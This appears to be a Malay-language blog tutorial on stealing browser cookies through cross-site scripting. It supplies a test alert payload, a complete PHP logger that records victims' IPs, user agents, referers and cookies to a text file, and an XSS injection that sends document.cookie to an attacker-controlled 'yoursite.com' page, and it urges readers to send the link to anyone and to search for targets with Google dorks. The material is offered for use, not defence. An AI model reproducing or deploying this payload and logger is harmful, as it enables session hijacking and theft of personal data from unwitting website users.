cara mencuri Cookies menggunakan XSS
tutorial ini adalah cara untuk mencuri biskut, atau mengambil biskut dari user yang klik pada website yang vulnerable kepada xss attack . XSS juga dikenali sebagai Cross site scripting . yang terdapat pada "web Application".Jika korang ingin menbaca dengan lebih lanjut , korang boleh rujuk pada link di bawah :
http://en.wikipedia.org/wiki/Cross-site_scripting
mari kita mulakan dengan tutorial untuk mencuri biskut .
Pertama anda perlu sediakan dua file :
apasahaja.php
log.txt
upload kedua-dua file tersebut kedalam webhosting .
ok . kita perlu dapatkan target . jika korang sudah dapatkan target ,korang boleh masukan code ini , untuk mengetahui sama ada target boleh di exploit atau tidak .
Code :
<script>alert("test")</script>
Ok. Mari belajar cara untuk Cuir biskut mengunakan Xss .
Pertama sekali korang masukan php code ini di dalam "apasaja.php"
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER[REMOTE_ADDR]) && $_SERVER[REMOTE_ADDR] && strcasecmp($_SERVER[REMOTE_ADDR], "unknown"))
$ip = $_SERVER[REMOTE_ADDR];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER[QUERY_STRING];
$register_globals = (bool) ini_get(register_gobals);
if ($register_globals) $ip = getenv(REMOTE_ADDR);
else $ip = GetIP();
$rem_port = $_SERVER[REMOTE_PORT];
$user_agent = $_SERVER[HTTP_USER_AGENT];
$rqst_method = $_SERVER[METHOD];
$rem_host = $_SERVER[REMOTE_HOST];
$referer = $_SERVER[HTTP_REFERER];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/ htm /i", $ipLog) || preg_match("/ html /i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie ");
fclose($log);
}
logData();
?>
dan save as.php .
script di atas akan merekod cookies user yang view link xss itu tadi .
Sebagai contoh , target kita adalah "http://google.com".
Jadi link yang vulnerable kepada xss adalah http://google.com/search_q=xss
Jadi yang korang perlu lakukan adalah :
Http://google.com/search_q="><script language= "JavaScript">document.location="http://yoursite.com/apasaja.php?cookie=" + document.cookie;document.location="http://google.com/"</script>
untuk mendapatkan cookies . Sila serahkan link xss korang kepada sesiapa sahaja seperti di atas ,
Sila buka log file korang , yang korang sertakan dengan apasahaja tadi ,
dan hasilnya korang akan dapat seperti dibawah :
IP: 125.16.48.169 | PORT: 56840 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: http://google.com/search |
Sila fahami konsep di atas , dan ambil exploit yang telah diberikan .
Jika korang nak tahu google dork mengenai Xss korang boleh rujuk link dibawah :
http://h4ckingtutors.blogspot.com/2012/07/hacking-xss-dork-repost.html
Itu sahaja . Enjoy
Incoming search :
Apakah Itu Xss
xss cookies stealing